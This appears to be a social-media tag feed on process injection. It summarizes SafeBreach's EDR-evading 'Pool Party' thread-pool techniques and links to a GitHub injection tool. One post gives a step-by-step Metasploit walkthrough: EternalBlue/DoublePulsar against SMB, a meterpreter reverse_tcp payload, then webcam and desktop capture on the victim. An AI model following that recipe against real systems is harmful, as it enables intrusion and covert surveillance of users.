#ProcessInjection
osintelligence · 1 year ago
Link
https://bit.ly/3tgesM8 - 🎉 SafeBreach Labs researchers have unveiled groundbreaking process injection techniques using Windows thread pools, outwitting leading endpoint detection and response (EDR) systems. These new methods, named "Pool Party" variants, bypass current EDR solutions by injecting malicious code into legitimate processes, posing a significant challenge for traditional cybersecurity measures. #CyberSecurity #ProcessInjection

🛡️ Understanding the limitations of existing process injection techniques, the researchers explored Windows thread pools as a novel vector. They developed eight unique techniques that work across all processes without limitations, enhancing their flexibility and effectiveness. These methods proved undetectable against five leading EDR solutions, highlighting a critical gap in current cyber defense strategies. #InnovationInCyberSecurity #ThreadPools

🔍 The research delved deep into the architecture of Windows thread pools, identifying potential areas for process injection. It focused on worker factories, task queues, I/O completion queues, and timer queues. The techniques involved manipulating these components to execute malicious code, revealing a sophisticated approach to cyber attacks. #TechResearch #AdvancedCyberAttacks

💻 Notably, the Pool Party variants were tested against five major EDR solutions, including Palo Alto Cortex and Microsoft Defender. All variants successfully evaded detection, demonstrating a 100% success rate. This finding underscores the need for continuous evolution and improvement in cybersecurity tools and practices. #EDRBypass #CyberThreats

🌐 The implications of this research are significant for the cybersecurity community. While EDR systems have evolved, they currently lack the capability to generically detect new process injection techniques. This research emphasizes the need for a more generic detection approach and deeper inspection of trusted processes to combat sophisticated cyber threats. #CyberDefense #InnovationInSecurity

🔗 SafeBreach has responsibly disclosed their findings and shared the research with the security community. By openly discussing these techniques at Black Hat Europe and providing a detailed GitHub repository, they aim to raise awareness and aid in the development of proactive defense strategies against such advanced attacks.
hackgit · 2 years ago
Text
[Media] ProcessInjection
ProcessInjection The program is designed to perform process injection. Currently the tool supports 5 process injection techniques. https://github.com/3xpl01tc0d3r/ProcessInjection #infosec #pentesting #redteam
reconshell · 3 years ago
Link
pacenoge · 8 years ago
Link
Just wanna share it.. I'm using this msf module http://ift.tt/2onj5kG. Clone it and copy-paste eternalblue_doublepulsar.rb to /usr/share/metasploit-framework/modules/exploits/windows/smb/. Run msfconsole and scan your local network with auxiliary/scanner/smb/smb_ms17_010 (MS17-010 SMB RCE Detection). Now use the exploit exploit/windows/smb/eternalblue_doublepulsar. Set the necessary options like RHOST, TARGETARCHITECTURE, TARGET and PROCESSINJECT. For DOUBLEPULSARPATH and ETERNALBLUEPATH, use the Eternalblue-Doublepulsar-Metasploit/deps/ directory, for example /root/Eternalblue-Doublepulsar-Metasploit/deps/. Don't forget to set the PAYLOAD windows/x64/meterpreter/reverse_tcp (my target uses x64 so I'm using an x64 payload too). If everything is set, now run exploit. Run some interesting commands like webcam_list or webcam_snap. The victim desktop screenshot. Tested on my local network; tool used: Metasploit running in Kali Linux. That's it, happy hacking!
reconshell · 2 years ago
Link
hackgit · 3 years ago
Text
ProcessInjection The program is designed to perform #process injection. Currently the tool supports 4 process #injection techniques. https://github.com/3xpl01tc0d3r/ProcessInjection
GitHub - 3xpl01tc0d3r/ProcessInjection: This program is designed to demonstrate various process injection techniques